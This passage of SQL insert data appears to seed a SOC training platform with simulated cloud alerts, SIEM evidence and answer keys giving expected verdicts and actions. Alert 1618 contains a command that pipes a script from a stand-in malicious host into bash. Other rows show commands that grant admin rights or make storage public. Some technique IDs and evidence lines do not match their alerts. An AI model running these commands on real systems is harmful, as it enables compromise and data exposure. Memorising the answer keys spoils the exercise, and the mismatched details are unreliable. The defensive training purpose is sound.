event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:34Z\\\",\\\"event_type\\\":\\\"policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"aws-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:34Z\\\",\\\"event_type\\\":\\\"policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"aws-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1617, 'Azure Blob Storage Public Exposure Detected', 'high', 'Azure Defender', 'A blob storage container was found to be publicly accessible, potentially exposing sensitive data.', 'Data Exposure', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:23:45Z\",\"event_type\":\"config_change\",\"src_ip\":\"198.51.100.67\",\"dst_ip\":\"192.168.2.10\",\"username\":\"storage_admin\",\"hostname\":\"azure-storage-blob\",\"request_body\":\"\",\"command_line\":\"az storage blob set-permission --container-name confidential-data --public-access blob\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"IP linked to multiple suspicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az storage blob set-permission --container-name confidential-data --public-access blob\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to expose blob storage publicly\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The command was used to alter blob storage settings, making sensitive data publicly accessible.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"198.51.100.67\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"storage_admin\\\",\\\"hostname\\\":\\\"azure-storage-blob\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"az storage blob set-permission --container-name confidential-data --public-access blob\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"198.51.100.67\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"storage_admin\\\",\\\"hostname\\\":\\\"azure-storage-blob\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"az storage blob set-permission --container-name confidential-data --public-access blob\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"198.51.100.67\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"storage_admin\\\",\\\"hostname\\\":\\\"azure-storage-blob\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"az storage blob set-permission --container-name confidential-data --public-access blob\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"198.51.100.67\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"storage_admin\\\",\\\"hostname\\\":\\\"azure-storage-blob\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"az storage blob set-permission --container-name confidential-data --public-access blob\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"198.51.100.67\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"storage_admin\\\",\\\"hostname\\\":\\\"azure-storage-blob\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"az storage blob set-permission --container-name confidential-data --public-access blob\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1618, 'GCP Crypto Mining Activity Detected', 'critical', 'GCP SCC', 'Unusual CPU usage detected in GCP instance indicating possible crypto mining activity. External IP involved.', 'Resource Hijacking', 'T1556', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:37:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.5\",\"username\":\"gcp_user\",\"hostname\":\"gcp-instance-crypto\",\"request_body\":\"\",\"command_line\":\"sh -c \\\"wget -q -O- http://malicious.site/script.sh | bash\\\"\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for hosting malicious scripts and crypto mining commands\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"sh -c \\\"wget -q -O- http://malicious.site/script.sh | bash\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Script indicative of crypto mining setup\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command indicates the downloading and execution of a mining script from a known malicious IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:37:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"gcp_user\\\",\\\"hostname\\\":\\\"gcp-instance-crypto\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"sh -c 
\\\\\\\"wget -q -O- http://malicious.site/script.sh | bash\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:37:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"gcp_user\\\",\\\"hostname\\\":\\\"gcp-instance-crypto\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"sh -c \\\\\\\"wget -q -O- http://malicious.site/script.sh | bash\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:37:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"gcp_user\\\",\\\"hostname\\\":\\\"gcp-instance-crypto\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"sh -c \\\\\\\"wget -q -O- http://malicious.site/script.sh | bash\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:37:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"gcp_user\\\",\\\"hostname\\\":\\\"gcp-instance-crypto\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"sh -c \\\\\\\"wget -q -O- http://malicious.site/script.sh | bash\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:37:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"gcp_user\\\",\\\"hostname\\\":\\\"gcp-instance-crypto\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"sh -c \\\\\\\"wget -q -O- http://malicious.site/script.sh | bash\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1619, 'False Positive: Suspicious AWS S3 Access', 'medium', 'AWS GuardDuty', 'An alert was triggered for unusual access patterns to an S3 bucket, however, the access was performed by an internal user during a scheduled maintenance.', 'Data Access', 'T1530', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:45:11Z\",\"event_type\":\"data_access\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"internal_user\",\"hostname\":\"corporate-server-1\",\"request_body\":\"\",\"command_line\":\"aws s3 cp s3://company-data /backup --recursive\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, part of routine operations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"internal_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Verified internal user performing authorized actions\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access pattern was part of scheduled maintenance by an internal user, matching expected behavior. A recursive copy of company-data is also what exfiltration looks like, so confirm the maintenance window and change record before closing rather than relying on the username and internal source IP alone.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.759Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:45:11Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"internal_user\\\",\\\"hostname\\\":\\\"corporate-server-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 cp s3://company-data /backup 
--recursive\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.759Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:45:11Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"internal_user\\\",\\\"hostname\\\":\\\"corporate-server-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 cp s3://company-data /backup --recursive\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.759Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:45:11Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"internal_user\\\",\\\"hostname\\\":\\\"corporate-server-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 cp s3://company-data /backup --recursive\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.759Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:45:11Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"internal_user\\\",\\\"hostname\\\":\\\"corporate-server-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 cp s3://company-data /backup --recursive\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.759Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:45:11Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.101\\\",\\\"username\\\":\\\"internal_user\\\",\\\"hostname\\\":\\\"corporate-server-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 cp s3://company-data /backup --recursive\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1620, 'Prisma Cloud Detects Misconfigured AWS S3 Bucket', 'high', 'Prisma Cloud', 'An AWS S3 bucket was found with public read access, potentially exposing sensitive files.', 'Misconfiguration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:15:30Z\",\"event_type\":\"config_change\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"172.16.0.10\",\"username\":\"cloud_admin\",\"hostname\":\"prisma-instance-1\",\"request_body\":\"\",\"command_line\":\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to alter bucket permissions to public\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The command executed is indicative of a serious misconfiguration leading to public data exposure. Containment should begin by reverting the bucket ACL to private; then confirm with cloud_admin whether the change was intentional, given that the source IP is flagged as malicious, and review bucket access logs for the period the bucket was public-read.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:15:30Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.10\\\",\\\"username\\\":\\\"cloud_admin\\\",\\\"hostname\\\":\\\"prisma-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3api 
put-bucket-acl --bucket sensitive-data --acl public-read\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:15:30Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.10\\\",\\\"username\\\":\\\"cloud_admin\\\",\\\"hostname\\\":\\\"prisma-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:15:30Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.10\\\",\\\"username\\\":\\\"cloud_admin\\\",\\\"hostname\\\":\\\"prisma-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:15:30Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.10\\\",\\\"username\\\":\\\"cloud_admin\\\",\\\"hostname\\\":\\\"prisma-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:15:30Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.10\\\",\\\"username\\\":\\\"cloud_admin\\\",\\\"hostname\\\":\\\"prisma-instance-1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3api put-bucket-acl --bucket sensitive-data --acl public-read\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1621, 'False Positive: Azure Sentinel Identifies Anomalous Login', 'low', 'Azure Defender', 'An alert was triggered for an anomalous login detected by Azure Sentinel, but the login was conducted by a traveling employee using a VPN.', 'Anomalous Login', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:22:50Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.10\",\"dst_ip\":\"192.168.0.5\",\"username\":\"employee1\",\"hostname\":\"vpn-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP address linked to multiple benign VPN use cases\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"employee1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Authorized employee account logging in from a VPN\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login originated from a known VPN and matches the employee\'s travel itinerary.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:50Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"dst_ip\\\":\\\"192.168.0.5\\\",\\\"username\\\":\\\"employee1\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:50Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"dst_ip\\\":\\\"192.168.0.5\\\",\\\"username\\\":\\\"employee1\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:50Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"dst_ip\\\":\\\"192.168.0.5\\\",\\\"username\\\":\\\"employee1\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:50Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"dst_ip\\\":\\\"192.168.0.5\\\",\\\"username\\\":\\\"employee1\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:50Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"198.51.100.10\\\",\\\"dst_ip\\\":\\\"192.168.0.5\\\",\\\"username\\\":\\\"employee1\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1622, 'AWS Lambda Function Abuse Detected', 'high', 'AWS GuardDuty', 'An AWS Lambda function is being abused to perform unauthorized actions, potentially leading to data exposure.', 'Execution', 'T1505', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:45:19Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"192.168.1.15\",\"username\":\"lambda_user\",\"hostname\":\"lambda-function-123\",\"request_body\":\"\",\"command_line\":\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized cloud access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of abusive resource use\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of unauthorized actions by the Lambda function indicates potential resource abuse. The access key passed on the command line is exposed in process and audit logs and must be treated as compromised: rotate it and review all activity performed with that key, not just this invocation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.768Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:45:19Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda-function-123\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.768Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:45:19Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda-function-123\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.768Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 